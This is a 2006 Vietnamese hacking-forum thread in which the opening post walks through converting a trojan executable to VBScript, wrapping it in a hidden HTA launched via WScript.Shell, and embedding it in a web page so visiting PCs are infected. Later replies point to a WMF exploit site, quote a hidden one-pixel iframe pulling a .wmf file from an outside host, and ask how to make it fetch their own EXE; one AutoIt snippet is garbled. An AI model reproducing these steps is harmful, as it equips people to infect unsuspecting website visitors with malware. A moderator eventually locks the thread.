English | Vietnamese
 

banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register   [Login] Loginhttp  | https  ]
 
Forum Index Thảo luận virus, trojan, spyware, worm... Đính trojan vào website-Cool  XML
  [Question]   Đính trojan vào website-Cool 23/07/2006 10:48:24 (+0700) | #1 | 9221
lang_tu_phi_dao
Member
[Minus]    0    [Plus]
Joined: 02/09/2004 22:15:31
Messages: 1
Offline
[Profile] [PM]
Gần đây trong topic xuất hiện rất nhiều bài viết hỏi xung quanh vấn đề này !

Bài viết này sẽ hướng dẫn các bạn convert file trojan sang mã vbscript ! Từ đó đưa lên website và tiến hành lây nhiễm xuống các pc truy cập ...
Cơ chế chạy các đoạn vbscript cũng giống như các đoạn mã các website dùng để tự động set homepage, tuy nhiên nó không sử dụng được cho hệ điều hành xp sp2 hoặc trình duyệt đã khóa activeX !
http://mail.packetstormsecurity.org/trojans/exe2vbs.zip

Đầu tiên các bạn sử dụng EXE2VBS để convert file trojan của mình ( chẳng hạn tôi sẽ xài 1 con MagicPS ), click vào file trojan kéo vô khung exe của exe2vbs ===> các bạn sẽ được 1 file *.js ! Okie giờ edit lại một chút để thành file hta ( định dạng html thực thi để chạy các activeX ) Chú ý khi chạy exe2vbs trong phần lực chọn có 3 ô các bạn đánh dấu vào 2 mục trên thôi
Mở file trojan.exe.js vừa convert ra bằng notepad or wordpad, cho thêm dòng
Code:
<script language=vbs>

vào trên cùng

Xuống dưới cùng thay dòng: WScript.CreateObject("WScript.Shell").run(pth)

bằng
Code:
Set Shell1 = CreateObject("WScript.Shell")
Shell1.Run(pth)
</script>
<HTA:APPLICATION WINDOWSTATE='minimize' SHOWINTASKBAR='no' />
</head>
<body onload='window.close()'>
</body>
</html>

Sau đó save lại thành file trojan.hta Sau đó mở file web ra thêm code này vào để run file trojan.hta
Code:
<center> 
<span datasrc="#oRun" datafld="view" dataformatas="html"></span> 
<xml id="oRun"> 
<preview> 
<view> 
<![CDATA[ 
<object id="oFile" data="trojan.hta?id=1"></object> 
]]> 
</view> 
</preview> 
</xml> 
</center> 
</body> 
</html>

File htm này sẽ là file để victim truy cập ! Chúc thành công


Phương pháp này thực ra không mới ( bạn có thể sử dụng 1 code hta để tự động set homepage, thay đổi cấu hình mặc định của pc, tự động download file về máy tính ... ) tuy nhiên việc tự động run các ActiveX này không còn thực hiện được với XP Sp2 nữa rồi !
[Locked] [Up] [Print Copy]
  [Question]   Đính trojan vào website-Cool 25/07/2006 02:50:24 (+0700) | #2 | 9637
peterhiep
Member
[Minus]    0    [Plus]
Joined: 24/07/2006 15:19:11
Messages: 5
Location: Korea
Offline
[Profile] [PM] [Email] [WWW] [Yahoo!]
Anh ơi em kô hiểu lắm anh có thể chỉ em rõ hơn nữa được kô ..Em cám ơn anh trước..
[Locked] [Up] [Print Copy]
  [Question]   Re: Đính trojan vào website-Cool 25/07/2006 03:03:12 (+0700) | #3 | 9642
tuananhxpmaster
Member
[Minus]    0    [Plus]
Joined: 24/07/2006 12:02:33
Messages: 3
Offline
[Profile] [PM]
Cách này tui xem trên mấy 4rum khác từ lâu roài
Ko ăn thua gì đâu :lolsmilie
lại còn mất công chờ exe2vbs nó convert nữa chứ
[Locked] [Up] [Print Copy]
  [Question]   Đính trojan vào website-Cool 25/07/2006 03:07:26 (+0700) | #4 | 9643
peterhiep
Member
[Minus]    0    [Plus]
Joined: 24/07/2006 15:19:11
Messages: 5
Location: Korea
Offline
[Profile] [PM] [Email] [WWW] [Yahoo!]
Vậy ah` Thế anh có cách đính Spy vào Website kô chỉ em với
[Locked] [Up] [Print Copy]
  [Question]   Đính trojan vào website-Cool 25/07/2006 03:23:50 (+0700) | #5 | 9645
tuananhxpmaster
Member
[Minus]    0    [Plus]
Joined: 24/07/2006 12:02:33
Messages: 3
Offline
[Profile] [PM]

peterhiep wrote:
Vậy ah` Thế anh có cách đính Spy vào Website kô chỉ em với 

pm : tuananhxp.computer@btinternet.com anh giúp cho
[Locked] [Up] [Print Copy]
  [Question]   Đính trojan vào website-Cool 27/07/2006 07:49:39 (+0700) | #6 | 10256
[Avatar]
 chupichu
Elite Member
[Minus]    0    [Plus]
Joined: 16/07/2004 14:17:57
Messages: 229
Location: Lầu Xanh
Offline
[Profile] [PM] [Yahoo!]

peterhiep wrote:
Vậy ah` Thế anh có cách đính Spy vào Website kô chỉ em với 

Bạn có thể nhúng trojan vào file *.html nhưng spy, keylogger thì do dung lượng nó lớn dẫn đến việc bạn không thể nhúng nó vào file *.html (Mà mình thấy chỉ có thể dụ victim download về thôi :twisted: )
Where Have You Gone..
[Locked] [Up] [Print Copy]
  [Question]   Đính trojan vào website-Cool 27/07/2006 09:13:14 (+0700) | #7 | 10265
peterhiep
Member
[Minus]    0    [Plus]
Joined: 24/07/2006 15:19:11
Messages: 5
Location: Korea
Offline
[Profile] [PM] [Email] [WWW] [Yahoo!]
uhm` bạn ah` bạn có biết làm một con victim kô chỉ mình làm với giúp đở mình nha có gí liên hệ với mình qua Gmail:sptink29@gmail.com
[Locked] [Up] [Print Copy]
  [Question]   Đính trojan vào website-Cool 27/07/2006 10:05:34 (+0700) | #8 | 10272
[Avatar]
 hackermientay
Member
[Minus]    0    [Plus]
Joined: 27/06/2006 23:21:20
Messages: 35
Offline
[Profile] [PM]

peterhiep wrote:
uhm` bạn ah` bạn có biết làm một con victim kô chỉ mình làm với giúp đở mình nha có gí liên hệ với mình qua Gmail:sptink29@gmail.com 


Con "victim" là con gì dzậy, tui mới nghe lần đầu smilie
[Locked] [Up] [Print Copy]
  [Question]   Re: Đính trojan vào website-Cool 27/07/2006 11:05:26 (+0700) | #9 | 10281
X7iVi4n
Member
[Minus]    0    [Plus]
Joined: 09/07/2006 23:25:52
Messages: 2
Offline
[Profile] [PM]
Victim là từ tiếng Anh có nghĩa là nạn nhân đó bạn. Ý chỉ mấy cái PC mở trang web của bạn lên đó smilie
Lần đầu tiên mình thấy có người hỏi về con victim đó smilie
[Locked] [Up] [Print Copy]
  [Question]   Đính trojan vào website-Cool 28/07/2006 05:29:08 (+0700) | #10 | 10465
[Avatar]
 kara_men
Member
[Minus]    0    [Plus]
Joined: 27/06/2006 02:32:38
Messages: 91
Offline
[Profile] [PM]
Ngồi đó mà đính đi, nó cài soft chống virus thì ở đó mà khóc. Gặp gà mới chết thui.

Gửi bà con cái link này, scan link trước khi truy cập smilie
http://www.explabs.com/linkscanner/
[Locked] [Up] [Print Copy]
  [Question]   Đính trojan vào website-Cool 30/07/2006 05:38:35 (+0700) | #11 | 11003
blue_river1
Member
[Minus]    0    [Plus]
Joined: 20/07/2006 11:40:20
Messages: 3
Offline
[Profile] [PM]
cách đính này cũ lắm rồi
[Locked] [Up] [Print Copy]
  [Question]   Đính trojan vào website-Cool 31/07/2006 21:28:19 (+0700) | #12 | 11346
[Avatar]
 Luke
Elite Member
[Minus]    0    [Plus]
Joined: 05/09/2002 13:21:20
Messages: 83
Offline
[Profile] [PM]
WMF Exploit
http://kehoach45a.com/a
[Locked] [Up] [Print Copy]
  [Question]   Re: Đính trojan vào website-Cool 03/08/2006 02:33:55 (+0700) | #13 | 12032
[Avatar]
 com_hacker
Member
[Minus]    0    [Plus]
Joined: 27/06/2006 12:55:55
Messages: 34
Location: Đâu???
Offline
[Profile] [PM] [WWW] [Yahoo!]
Anh luke là đỉnh nhất
giờ mới sáng mắt ra( :shock: ) chớ trước đây làm mấy cái vbscript chạy chẳng dc.
THANK nha LUKE nhiều
[Locked] [Up] [Print Copy]
  [Question]   Đính trojan vào website-Cool 03/08/2006 04:14:33 (+0700) | #14 | 12054
[Avatar]
 dongkivs8xx
Member
[Minus]    0    [Plus]
Joined: 15/07/2006 11:19:48
Messages: 72
Location: nơi có Em...
Offline
[Profile] [PM]
Chài Ạ ! Cái link của Ông luke là kí j` thế? khả nghi wa' ! lần sau gửi link lên thì fair có note nhé!
[Locked] [Up] [Print Copy]
  [Question]   Re: Đính trojan vào website-Cool 05/08/2006 05:05:34 (+0700) | #15 | 12404
[Avatar]
 com_hacker
Member
[Minus]    0    [Plus]
Joined: 27/06/2006 12:55:55
Messages: 34
Location: Đâu???
Offline
[Profile] [PM] [WWW] [Yahoo!]
Ai bảo chạy thử làm gì
http://viewhtml.com
view code mà nghiên cứu đã chứ
[Locked] [Up] [Print Copy]
  [Question]   Đính trojan vào website-Cool 05/08/2006 14:10:01 (+0700) | #16 | 12494
[Avatar]
 jamesmr
Member
[Minus]    0    [Plus]
Joined: 03/03/2006 06:30:26
Messages: 153
Offline
[Profile] [PM]

Luke wrote:
WMF Exploit
http://kehoach45a.com/a 

ông anh này mới đúng là cao thủ võ lâm.ông anh viết nhiều nhiều cho anh em newbie chúng tôi học hỏi thêm.tks a lot.
[Locked] [Up] [Print Copy]
  [Question]   Đính trojan vào website-Cool 09/08/2006 00:40:12 (+0700) | #17 | 13268
[Avatar]
 jamesmr
Member
[Minus]    0    [Plus]
Joined: 03/03/2006 06:30:26
Messages: 153
Offline
[Profile] [PM]

Luke wrote:
WMF Exploit
http://kehoach45a.com/a 

Luke có tool (exe) không share cho em cái(jamesmr198@yahoo.com).tôi có mã nguon(vs203) nhưng compile nó báo lỗi hoài(báo lỗi khi biên dịch file winnt.h,winbase.h)
[Locked] [Up] [Print Copy]
  [Question]   Đính trojan vào website-Cool 09/08/2006 03:15:18 (+0700) | #18 | 13293
mgdaubo
Member
[Minus]    0    [Plus]
Joined: 10/04/2006 03:24:04
Messages: 44
Offline
[Profile] [PM]
View code rồi mà vẫn chưa hiểu, bây giờ mình muốn nó tự download và chạy 1 file exe của mình thì làm thế nào nhỉ? có phải thay cái src trong: ('<iframe src="http://kehoach45a.com/shop/picasa.wmf" width="1" height="1"></iframe>') bằng url đến file exe của mình không?
[Locked] [Up] [Print Copy]
  [Question]   Đính trojan vào website-Cool 09/08/2006 05:06:25 (+0700) | #19 | 13332
phamtienhuong
Member
[Minus]    0    [Plus]
Joined: 20/11/2005 03:10:43
Messages: 11
Offline
[Profile] [PM]
he he bác ngồi đấy mà thay.

Lập trình AutoIt :

Line(File"c:\windows\download.exe);
$download =StringReplace($ie.LocationURL,"http://services.google.com/picasa_referrals.html","http://dl.google.com/referrals/picas2Setup.exe")
$download =StringReplace($ie.LocationURL)
Line 0 (file "c:\\windows\download.exe");
$ie.Navigate($download)
$ie.Navigate($download)


Không biết em nói thế có đúng không?? nếu không phải em xin lỗi bác luke vì đã mạo phạm.
[Locked] [Up] [Print Copy]
  [Question]   Đính trojan vào website-Cool 09/08/2006 05:09:38 (+0700) | #20 | 13333
xuanson
Member
[Minus]    0    [Plus]
Joined: 27/07/2006 16:46:06
Messages: 50
Offline
[Profile] [PM]
Exploit Win32 WMF-PFV ????
[Locked] [Up] [Print Copy]
  [Question]   Đính trojan vào website-Cool 09/08/2006 08:24:56 (+0700) | #21 | 13393
mgdaubo
Member
[Minus]    0    [Plus]
Joined: 10/04/2006 03:24:04
Messages: 44
Offline
[Profile] [PM]
Ah hiểu sơ sơ rồi, có phải là cái này lợi dụng lỗ hổng của file wmf không? nguyên tắc là đính 1 exe vào 1 file wmf rồi đưa lên web để window tự chạy file wmf đó ,có phải không?
Nhưng còn cái đoạn code của Luke đếm lượt truy cập rồi lưu vào cookie làm gì vậy?
Mà nó còn liên quan gì tới lập trình autoit gì nữa vậy bạn phamtienhuong?
Chủ yếu là Exploit Win32 WMF thì lại ko thấy nói gì đến.
Các bạn giải thích dùm đi!
[Locked] [Up] [Print Copy]
  [Question]   Đính trojan vào website-Cool 09/08/2006 10:14:24 (+0700) | #22 | 13416
[Avatar]
 jamesmr
Member
[Minus]    0    [Plus]
Joined: 03/03/2006 06:30:26
Messages: 153
Offline
[Profile] [PM]

mgdaubo wrote:
Ah hiểu sơ sơ rồi, có phải là cái này lợi dụng lỗ hổng của file wmf không? nguyên tắc là đính 1 exe vào 1 file wmf rồi đưa lên web để window tự chạy file wmf đó ,có phải không?
Các bạn giải thích dùm đi! 

có 1 tool embed file exe vào file wmf ,nếu ai co share cho AE cái.
[Locked] [Up] [Print Copy]
  [Question]   Đính trojan vào website-Cool 09/08/2006 10:16:31 (+0700) | #23 | 13419
[Avatar]
 jamesmr
Member
[Minus]    0    [Plus]
Joined: 03/03/2006 06:30:26
Messages: 153
Offline
[Profile] [PM]

mgdaubo wrote:
View code rồi mà vẫn chưa hiểu, bây giờ mình muốn nó tự download và chạy 1 file exe của mình thì làm thế nào nhỉ? có phải thay cái src trong: ('<iframe src="http://kehoach45a.com/shop/picasa.wmf" width="1" height="1"></iframe>') bằng url đến file exe của mình không? 

ko phải, bạn phải tìm tool embed file exe vào wmf.ai có share cho ae cái.
[Locked] [Up] [Print Copy]
  [Question]   Re: Đính trojan vào website-Cool 31/12/2007 09:33:25 (+0700) | #24 | 107157
crystal_eg
Member
[Minus]    0    [Plus]
Joined: 30/10/2007 11:29:23
Messages: 1
Offline
[Profile] [PM]
anh ơi anh có thể cho em cái key của con magic ps se ++ ko ạ smilie
[Locked] [Up] [Print Copy]
  [Question]   Re: Đính trojan vào website-Cool 31/12/2007 12:12:26 (+0700) | #25 | 107193
LeVuHoang
HVA Friend
Joined: 08/03/2003 16:54:07
Messages: 1155
Offline
[Profile] [PM]
Trời ơi, cái bài này từ 2006 giờ lôi ra xin key của PS-Magic ????
Topic locked (vì lý do không phù hợp với đường lối hiện tại của HVA).
crystal_eg warned.
[Locked] [Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|